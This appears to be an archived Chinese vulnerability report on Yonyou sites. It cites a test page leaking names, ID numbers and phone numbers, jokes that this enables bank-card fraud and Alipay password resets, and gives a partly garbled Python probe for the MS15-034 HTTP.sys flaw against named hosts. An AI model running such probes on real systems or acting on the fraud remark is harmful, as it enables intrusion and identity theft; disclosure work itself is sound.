### 简要描述:
具体泄漏信息:姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号,可以去办个银行卡以及找回支付宝密码了……
### 详细说明:
```
http://li.yonyou.com/test.aspx
```
具体泄漏信息:姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号
[<img src="https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png)
另外还有几个MS15-034 HTTP.sys 远程代码执行漏洞:
```
http://h.yonyou.com/
http://hr.yonyou.com/
http://q.yonyou.com/
```
检测POC:
```
#!/usr/bin/env python
__author__ = ';jastra';
class bg_colors:
VULN = ';33[92m';
NONVULN= ';33[95m';
EXPLOIT = ';33[91m';
try:
import requests
import re
except ImportError as ierr:
print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr)
def identify_iis(domain):
req = requests.get(str(domain))
remote_server = req.headers[';server';]
if "Microsoft-IIS" in remote_server:
print(bg_colors.VULN + "[+] 服务是 " + remote_server)
ms15_034_test(str(domain))
else:
print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)
def ms15_034_test(domain):
print(" 启动vuln检查!")
vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
req = requests.get(str(domain), params=vuln_buffer)
if req.headers[';content';] == "请求范围不符合":
print(bg_colors.EXPLOIT + "[+] 存在漏洞")
else:
print(bg_colors.EXPLOIT + "[-] IIS服务无法显示漏洞是否存在. "+
"需要手动检测")
usr_domain = raw_input("输入域名扫描: ")
identify_iis(usr_domain)
```
### 漏洞证明:
如上
暂无评论